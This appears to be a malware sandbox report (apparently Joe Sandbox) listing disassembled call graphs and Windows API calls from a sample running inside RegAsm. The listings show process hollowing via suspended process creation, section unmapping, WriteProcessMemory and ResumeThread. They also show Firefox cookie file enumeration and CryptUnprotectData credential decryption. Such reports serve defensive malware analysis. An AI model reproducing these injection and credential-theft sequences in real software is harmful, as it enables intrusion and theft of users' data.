55869->55868 55870 401f13 28 API calls 55869->55870 55871 41bc07 28 API calls 55869->55871 55872 40c9bf 28 API calls 55869->55872 55873 401f09 11 API calls 55869->55873 55874 40c756 PathFileExistsW 55869->55874 55876 40c772 55869->55876 56044 40c916 28 API calls 55869->56044 55870->55869 55871->55869 55872->55869 55873->55869 55874->55869 55877 401f09 11 API calls 55876->55877 55878 40c77a 55877->55878 55879 401f09 11 API calls 55878->55879 55880 406442 55879->55880 55881 40c78a 55880->55881 56045 40c589 55881->56045 55884 40915b 28 API calls 55885 40c7ab 55884->55885 55886 40c7b4 PathFileExistsW 55885->55886 55887 40c7c1 55886->55887 55888 40c7cc 55886->55888 55889 403262 11 API calls 55887->55889 55890 40417e 28 API calls 55888->55890 55891 40c7ca 55889->55891 55890->55891 55892 401f09 11 API calls 55891->55892 55893 40c7de 55892->55893 55894 401f09 11 API calls 55893->55894 55895 40644e 55894->55895 55896 40c7ed 55895->55896 55897 40c4c3 29 API calls 55896->55897 55898 40c7fe 55897->55898 55899 40915b 28 API calls 55898->55899 55900 40c80e 55899->55900 55901 40c817 PathFileExistsW 55900->55901 55902 40c824 55901->55902 55903 40c82f 55901->55903 55904 403262 11 API calls 55902->55904 55905 40417e 28 API calls 55903->55905 55906 40c82d 55904->55906 55905->55906 55907 401f09 11 API calls 55906->55907 55908 40c841 55907->55908 55909 401f09 11 API calls 55908->55909 55910 40645a 55909->55910 55911 40c850 55910->55911 55912 40c526 29 API calls 55911->55912 55913 40c861 55912->55913 55914 40915b 28 API calls 55913->55914 55915 40c871 55914->55915 55916 40c87a PathFileExistsW 55915->55916 55917 40c892 55916->55917 55918 40c887 55916->55918 55919 40417e 28 API calls 55917->55919 55920 403262 11 API calls 55918->55920 55921 40c890 55919->55921 55920->55921 55922 401f09 11 API calls 55921->55922 55923 40c8a4 55922->55923 55924 401f09 11 API calls 55923->55924 55925 406466 55924->55925 55926 40c8b3 55925->55926 55927 40c589 29 API calls 55926->55927 55928 40c8c4 55927->55928 55929 40915b 28 API calls 55928->55929 55930 40c8d4 55929->55930 55931 40c8dd PathFileExistsW 55930->55931 55932 40c8f5 55931->55932 55933 40c8ea 55931->55933 55934 40417e 28 API calls 55932->55934 55935 403262 11 API calls 55933->55935 55936 40c8f3 55934->55936 55935->55936 55937 401f09 11 API calls 55936->55937 55938 40c907 55937->55938 55939 401f09 11 API calls 55938->55939 55940 40c90f 55939->55940 55940->55665 55942 41c4ab 55941->55942 55943 41c4af GetFileSize 55941->55943 55942->55667 56057 40244e 55943->56057 55945 41c4c3 55946 41c4d5 ReadFile 55945->55946 55947 41c4e2 55946->55947 55948 41c4e4 CloseHandle 55946->55948 55947->55948 55948->55942 55950 4020df 11 API calls 55949->55950 55951 4068fc 55950->55951 55952 41c485 32 API calls 55951->55952 55953 40690d 55952->55953 55954 406911 55953->55954 55955 40691f 55953->55955 55956 402093 28 API calls 55954->55956 55957 402093 28 API calls 55955->55957 55958 40691d 55956->55958 55961 40692c 55957->55961 55959 401fd8 11 API calls 55958->55959 55960 4065b2 55959->55960 55968 406991 55960->55968 55962 40696d 55961->55962 55964 40695e 55961->55964 55963 402093 28 API calls 55962->55963 55965 40696b 55963->55965 55966 4041a2 28 API calls 55964->55966 55967 401fd8 11 API calls 55965->55967 55966->55965 55967->55958 55969 4069a1 55968->55969 55970 4069a5 55969->55970 55972 4069b6 55969->55972 55971 402093 28 API calls 55970->55971 55979 4065bd 55971->55979 56062 406a63 55972->56062 55974 406a2b ctype 55975 406a42 55974->55975 55976 406a4f 55974->55976 55977 4020b7 28 API calls 55975->55977 55978 402093 28 API calls 55976->55978 55977->55979 55978->55979 55979->55679 55981 406b34 55980->55981 55985 4067ea 55981->55985 56066 406c0c 11 API calls 55981->56066 55983 406b55 56067 402712 11 API calls std::_Deallocate 55983->56067 55985->55768 55986->55669 55988 40c4d6 55987->55988 55989 40417e 28 API calls 55988->55989 55990 40c4e0 55989->55990 55991 40c4f5 PathFileExistsW 55990->55991 55992 40c502 55991->55992 55993 40c50d 55991->55993 55994 403262 11 API calls 55992->55994 55995 40417e 28 API calls 55993->55995 55996 40c50b 55994->55996 55995->55996 55997 401f09 11 API calls 55996->55997 55998 40c51f 55997->55998 55998->55841 56000 41bc20 ___scrt_get_show_window_mode 55999->56000 56010 441eb8 56000->56010 56003 40417e 28 API calls 56004 41bc3a 56003->56004 56004->55851 56019 403969 56005->56019 56007 40c9d2 56007->55851 56008->55851 56009->55851 56011 441ec4 56010->56011 56014 441cf2 56011->56014 56013 41bc2c 56013->56003 56015 441d09 56014->56015 56017 441d4d __wsopen_s 56015->56017 56018 4405dd 20 API calls _free 56015->56018 56017->56013 56018->56017 56020 402888 22 API calls 56019->56020 56021 40397b 56020->56021 56022 402888 22 API calls 56021->56022 56023 403989 56022->56023 56024 403bc3 56023->56024 56025 4039ca 56023->56025 56030 4028a4 22 API calls 56024->56030 56028 4027e6 28 API calls 56025->56028 56029 4039fb 56025->56029 56028->56029 56029->56007 56032 40c539 56031->56032 56033 40417e 28 API calls 56032->56033 56034 40c543 56033->56034 56035 40c558 PathFileExistsW 56034->56035 56036 40c570 56035->56036 56037 40c565 56035->56037 56039 40417e 28 API calls 56036->56039 56038 403262 11 API calls 56037->56038 56040 40c56e 56038->56040 56039->56040 56041 401f09 11 API calls 56040->56041 56042 40c582 56041->56042 56042->55863 56043->55869 56044->55869 56046 40c59c 56045->56046 56047 40417e 28 API calls 56046->56047 56048 40c5a6 56047->56048 56049 40c5bb PathFileExistsW 56048->56049 56050 40c5d3 56049->56050 56051 40c5c8 56049->56051 56052 40417e 28 API calls 56050->56052 56053 403262 11 API calls 56051->56053 56054 40c5d1 56052->56054 56053->56054 56055 401f09 11 API calls 56054->56055 56056 40c5e5 56055->56056 56056->55884 56058 402456 56057->56058 56060 402460 56058->56060 56061 402a51 28 API calls 56058->56061 56060->55945 56061->56060 56063 406a94 CryptUnprotectData 56062->56063 56064 406a78 LoadLibraryA GetProcAddress 56062->56064 56065 406aa9 56063->56065 56064->56063 56065->55974 56065->56065 56066->55983 56067->55985 56076 416411 56077 401e65 22 API calls 56076->56077 56078 416421 56077->56078 56079 4020f6 28 API calls 56078->56079 56080 41642c 56079->56080 56081 401e65 22 API calls 56080->56081 56082 416437 56081->56082 56083 4020f6 28 API calls 56082->56083 56084 416442 56083->56084 56093 40aa93 56084->56093 56094 4046f7 14 API calls 56093->56094 56095 40aaad 56094->56095 56096 40482d 3 API calls 56095->56096 56097 40aab8 56096->56097 56098 4048c8 97 API calls 56097->56098 56099 40aac4 56098->56099 56100 40ac57 56099->56100 56101 4020df 11 API calls 56099->56101 56102 402f31 28 API calls 56100->56102 56104 40aadc 56101->56104 56103 40ac70 56102->56103 56105 402f10 28 API calls 56103->56105 56108 41c485 32 API calls 56104->56108 56106 40ac7a 56105->56106 56107 404aa1 61 API calls 56106->56107 56109 40ac88 56107->56109 56110 40aaee 56108->56110 56111 401fd8 11 API calls 56109->56111 56112 40aaf6 56110->56112 56113 40ac4f 56110->56113 56115 40ac90 56111->56115 56114 401e65 22 API calls 56112->56114 56116 401fd8 11 API calls 56113->56116 56117 40ab02 56114->56117 56118 404e26 99 API calls 56115->56118 56116->56100 56120 40abbd 56117->56120 56140 40ab12 56117->56140 56119 40ac9b 56118->56119 56122 40ac4d 56119->56122 56123 40acac 56119->56123 56121 402f31 28 API calls 56120->56121 56124 40abdc 56121->56124 56172 404ee2 99 API calls 56122->56172 56171 40b869 DeleteFileW RemoveDirectoryW 56123->56171 56127 402f10 28 API calls 56124->56127 56130 40abe7 56127->56130 56132 402f10 28 API calls 56130->56132 56134 40abf2 56132->56134 56136 402f10 28 API calls 56134->56136 56137 40abfc 56136->56137 56138 404aa1 61 API calls 56137->56138 56139 40ac0a 56138->56139 56141 401fd8 11 API calls 56139->56141 56142 406dd8 28 API calls 56140->56142 56144 40ac12 56141->56144 56143 40ab53 56142->56143 56145 402f31 28 API calls 56143->56145 56146 401fd8 11 API calls 56144->56146 56147 40ab72 56145->56147 56148 40abb8 56146->56148 56149 402f10 28 API calls 56147->56149 56150 401fd8 11 API calls 56148->56150 56151 40ab7d 56149->56151 56152 40ac22 56150->56152 56153 402f10 28 API calls 56151->56153 56154 404e26 99 API calls 56152->56154 56155 40ab88 56153->56155 56156 40ac2d 56154->56156 56157 402f10 28 API calls 56155->56157 56160 40ac45 56156->56160 56161 40ac3e 56156->56161 56158 40ab92 56157->56158 56159 404aa1 61 API calls 56158->56159 56162 40aba0 56159->56162 56164 401fd8 11 API calls 56160->56164 56170 40b869 DeleteFileW RemoveDirectoryW 56161->56170 56165 401fd8 11 API calls 56162->56165 56164->56122 56166 40aba8 56165->56166 56167 401fd8 11 API calls 56166->56167 56168 40abb0 56167->56168 56169 401fd8 11 API calls 56168->56169 56169->56148 56170->56160 56171->56122 56173 434875 56178 434b47 SetUnhandledExceptionFilter 56173->56178 56175 43487a pre_c_initialization 56179 44554b 20 API calls 2 library calls 56175->56179 56177 434885 56178->56175 56179->56177 56180 44831e 56188 448710 56180->56188 56183 448332 56185 44833a 56186 448347 56185->56186 56196 44834a 11 API calls 56185->56196 56189 4484ca _free 5 API calls 56188->56189 56190 448737 56189->56190 56191 44874f TlsAlloc 56190->56191 56192 448740 56190->56192 56191->56192 56193 434fcb ___crtLCMapStringA 5 API calls 56192->56193 56194 448328 56193->56194 56194->56183 56195 448299 20 API calls 2 library calls 56194->56195 56195->56185 56196->56183 56197 100020db 56199 100020e7 ___DestructExceptionObject 56197->56199 56198 10002110 dllmain_raw 56200 1000212a 56198->56200 56209 100020f6 56198->56209 56199->56198 56203 1000210b 56199->56203 56199->56209 56210 10001eec 56200->56210 56202 10002177 56204 10001eec 29 API calls 56202->56204 56202->56209 56203->56202 56206 10001eec 29 API calls 56203->56206 56203->56209 56205 1000218a 56204->56205 56207 10002193 dllmain_raw 56205->56207 56205->56209 56208 1000216d dllmain_raw 56206->56208 56207->56209 56208->56202 56211 10001ef7 56210->56211 56212 10001f2a dllmain_crt_process_detach 56210->56212 56213 10001f1c dllmain_crt_process_attach 56211->56213 56214 10001efc 56211->56214 56216 10001f06 56212->56216 56213->56216 56215 10001f12 56214->56215 56217 10001f01 56214->56217 56221 100023ec 27 API calls 56215->56221 56216->56203 56217->56216 56220 1000240b 25 API calls 56217->56220 56220->56216 56221->56216 56222 43be58 56224 43be64 _swprintf ___DestructExceptionObject 56222->56224 56223 43be72 56238 4405dd 20 API calls _free 56223->56238 56224->56223 56227 43be9c 56224->56227 56226 43be77 ___DestructExceptionObject __wsopen_s 56233 445888 EnterCriticalSection 56227->56233 56229 43bea7 56234 43bf48 56229->56234 56233->56229 56236 43bf56 56234->56236 56235 43beb2 56239 43becf LeaveCriticalSection std::_Lockit::~_Lockit 56235->56239 56236->56235 56240 44976c 37 API calls 2 library calls 56236->56240 56238->56226 56239->56226 56240->56236 56241 41dfbd 56242 41dfd2 _Yarn ___scrt_get_show_window_mode 56241->56242 56243 41e1d5 56242->56243 56245 432ec4 21 API calls 56242->56245 56249 41e189 56243->56249 56255 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 56243->56255 56248 41e182 ___scrt_get_show_window_mode 56245->56248 56246 41e1e6 56247 432ec4 21 API calls 56246->56247 56246->56249 56251 41e21f ___scrt_get_show_window_mode 56247->56251 56248->56249 56250 432ec4 21 API calls 56248->56250 56253 41e1af ___scrt_get_show_window_mode 56250->56253 56251->56249 56256 43354a 56251->56256 56253->56249 56254 432ec4 21 API calls 56253->56254 56254->56243 56255->56246 56259 433469 56256->56259 56258 433552 56258->56249 56260 433482 56259->56260 56264 433478 56259->56264 56261 432ec4 21 API calls 56260->56261 56260->56264 56262 4334a3 56261->56262 56262->56264 56265 433837 CryptAcquireContextA 56262->56265 56264->56258 56266 433858 CryptGenRandom 56265->56266 56268 433853 56265->56268 56267 43386d CryptReleaseContext 56266->56267 56266->56268 56267->56268 56268->56264 56269 40165e 56270 401666 56269->56270 56271 401669 56269->56271 56272 4016a8 56271->56272 56274 401696 56271->56274 56273 4344ea new 22 API calls 56272->56273 56275 40169c 56273->56275 56276 4344ea new 22 API calls 56274->56276 56276->56275 56277 426bdc 56283 426cb1 recv 56277->56283 56284 10001f3f 56285 10001f4b ___DestructExceptionObject 56284->56285 56302 1000247c 56285->56302 56287 10001f57 ___scrt_is_nonwritable_in_current_image 56288 10001f52 56288->56287 56289 10002041 56288->56289 56290 10001f7c 56288->56290 56318 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 56289->56318 56313 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 56290->56313 56293 10002048 56294 10001f8b __RTC_Initialize 56294->56287 56314 100022fc RtlInitializeSListHead 56294->56314 56296 10001f99 ___scrt_initialize_default_local_stdio_options 56315 100046c5 5 API calls _ValidateLocalCookies 56296->56315 56298 10001fad 56298->56287 56316 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 56298->56316 56300 10001fb8 56300->56287 56317 10004669 5 API calls _ValidateLocalCookies 56300->56317 56303 10002485 56302->56303 56319 10002933 IsProcessorFeaturePresent 56303->56319 56305 10002491 56320 100034ea 56305->56320 56307 10002496 56308 1000249a 56307->56308 56329 100053c8 56307->56329 56308->56288 56311 100024b1 56311->56288 56313->56294 56314->56296 56315->56298 56316->56300 56317->56287 56318->56293 56319->56305 56321 100034ef ___vcrt_initialize_winapi_thunks 56320->56321 56333 10003936 6 API calls 2 library calls 56321->56333 56323 100034f9 56324 100034fd 56323->56324 56334 100038e8 56323->56334 56324->56307 56326 10003505 56327 10003510 56326->56327 56342 10003972 RtlDeleteCriticalSection 56326->56342 56327->56307 56361 10007457 56329->56361 56332 10003529 7 API calls 3 library calls 56332->56308 56333->56323 56343 10003af1 56334->56343 56338 1000390b 56339 10003918 56338->56339 56349 1000391b 5 API calls ___vcrt_FlsFree 56338->56349 56339->56326 56341 100038fd 56341->56326 56342->56324 56350 10003a82 56343->56350 56345 10003b0b 56346 10003b24 TlsAlloc 56345->56346 56347 100038f2 56345->56347 56347->56341 56348 10003ba2 5 API calls try_get_function 56347->56348 56348->56338 56349->56341 56351 10003aaa 56350->56351 56353 10003aa6 __crt_fast_encode_pointer 56350->56353 56351->56353 56354 100039be 56351->56354 56353->56345 56359 100039cd try_get_first_available_module 56354->56359 56355 100039ea LoadLibraryExW 56356 10003a05 GetLastError 56355->56356 56355->56359 56356->56359 56357 10003a60 FreeLibrary 56357->56359 56358 10003a77 56358->56353 56359->56355 56359->56357 56359->56358 56360 10003a38 LoadLibraryExW 56359->56360 56360->56359 56364 10007470 56361->56364 56362 10002ada _ValidateLocalCookies 5 API calls 56363 100024a3 56362->56363 56363->56311 56363->56332 56364->56362 56365 10005bff 56373 10005d5c 56365->56373 56368 10005c13 56370 10005c1b 56371 10005c28 56370->56371 56381 10005c2b 10 API calls 56370->56381 56374 10005c45 __dosmaperr 4 API calls 56373->56374 56375 10005d83 56374->56375 56376 10005d9b TlsAlloc 56375->56376 56377 10005d8c 56375->56377 56376->56377 56378 10002ada _ValidateLocalCookies 5 API calls 56377->56378 56379 10005c09 56378->56379 56379->56368 56380 10005b7a 19 API calls 2 library calls 56379->56380 56380->56370 56381->56368

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                                                                                            • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                                                                                            • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                                                                                            • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                                                                                            • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                                                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                                                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                                                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                                                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                            • API String ID: 4236061018-3687161714
                                                                                                                            • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                                                            • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                                                                                            • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                                                            • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 448 4180ef-418118 449 41811c-418183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 418480 449->450 451 418189-418190 449->451 453 418482-41848c 450->453 451->450 452 418196-41819d 451->452 452->450 454 4181a3-4181a5 452->454 454->450 455 4181ab-4181d8 call 436e90 * 2 454->455 455->450 460 4181de-4181e9 455->460 460->450 461 4181ef-41821f CreateProcessW 460->461 462 418225-41824d VirtualAlloc GetThreadContext 461->462 463 41847a GetLastError 461->463 464 418253-418273 ReadProcessMemory 462->464 465 418444-418478 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->465 463->450 464->465 466 418279-41829b NtCreateSection 464->466 465->450 466->465 467 4182a1-4182ae 466->467 468 4182c1-4182e3 NtMapViewOfSection 467->468 469 4182b0-4182bb NtUnmapViewOfSection 467->469 470 4182e5-418322 VirtualFree NtClose TerminateProcess 468->470 471 41832d-418354 GetCurrentProcess NtMapViewOfSection 468->471 469->468 470->449 472 418328 470->472 471->465 473 41835a-41835e 471->473 472->450 474 418360-418364 473->474 475 418367-418385 call 436910 473->475 474->475 478 4183c7-4183d0 475->478 479 418387-418395 475->479 480 4183f0-4183f4 478->480 481 4183d2-4183d8 478->481 482 418397-4183ba call 436910 479->482 484 4183f6-418413 WriteProcessMemory 480->484 485 418419-418430 SetThreadContext 480->485 481->480 483 4183da-4183ed call 418503 481->483 491 4183bc-4183c3 482->491 483->480 484->465 488 418415 484->488 485->465 489 418432-41843e ResumeThread 485->489 488->485 489->465 493 418440-418442 489->493 491->478 493->453
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                                                                            • ReadProcessMemory.KERNEL32 ref: 0041826B
                                                                                                                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                                                                            • NtClose.NTDLL(?), ref: 004182F7
                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                                                                                            • WriteProcessMemory.KERNEL32 ref: 0041840B
                                                                                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                                                                            • ResumeThread.KERNEL32(?), ref: 00418435
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                                                                                                                            • NtClose.NTDLL(?), ref: 00418468
                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                                                                            • GetLastError.KERNEL32 ref: 0041847A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                            • API String ID: 316982871-3035715614
                                                                                                                            • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                            • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                                                                            • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                                                                            • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                                            • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                            • API String ID: 1164774033-405221262
